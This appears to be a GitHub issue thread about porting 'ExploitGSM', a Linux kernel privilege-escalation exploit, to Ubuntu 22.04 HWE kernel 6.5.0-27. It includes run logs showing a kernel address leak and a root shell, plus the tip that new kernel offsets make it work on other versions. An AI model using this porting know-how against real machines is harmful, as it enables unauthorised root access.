Ubuntu HWE Kernel 6.5.0-27

[lehrhardt-tarent]

Hey,

with your latest commits, the ExploitGSM6_5 compiles under Ubuntu 22.04 successfully. The exploit was successful with kernel package version 6.5.0-25 on my machine:

begin try leak startup_xen! startup_xen leaked address -> ffffffffbc6933c0 text leaked address -> ffffffffba000000 lockdep_map_size -> 32 spinlock_t_size -> 4 mutex_size -> 32 tty port -> 376 tty buffhead -> 136 dead -> 524 waiting setconf dlci thread Wait 3 sec for ending kernel work execution We get root, spawn shell To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details.

root@machine:/root# uname -a Linux machine 6.5.0-25-generic #25~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 20 16:09:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

The latest kernel package is 6.5.0-27 with Ubuntu 22.04 HWE version. If you adjust main.c to match kernel package version 6.5.0-27 the exploit can be executed. However, it just fails. Is the exploit limited to ubuntu 6.5.0-25 package and 6.5.0-27 is safe?

[YuriiCrimson]

No you should just add new kernel offsets on exploits

[lehrhardt-tarent]

Ok, understood. I've added matching kernel offsets for 6.5.0-27 in main.c and recompiled and the exploit also works with the latest ubuntu hwe package then:

./ExploitGSM ubuntu-27 permissible spray -> 500 begin try leak startup_xen! startup_xen leaked address -> ffffffff8ce933d0 text leaked address -> ffffffff8a800000 lockdep_map_size -> 32 spinlock_t_size -> 4 mutex_size -> 32 tty port -> 376 tty buffhead -> 136 dead -> 524 waiting setconf dlci thread Wait 3 sec for ending kernel work execution We get root, spawn shell To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details.

root@machine:/root# uname -a Linux machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

[YuriiCrimson]

cool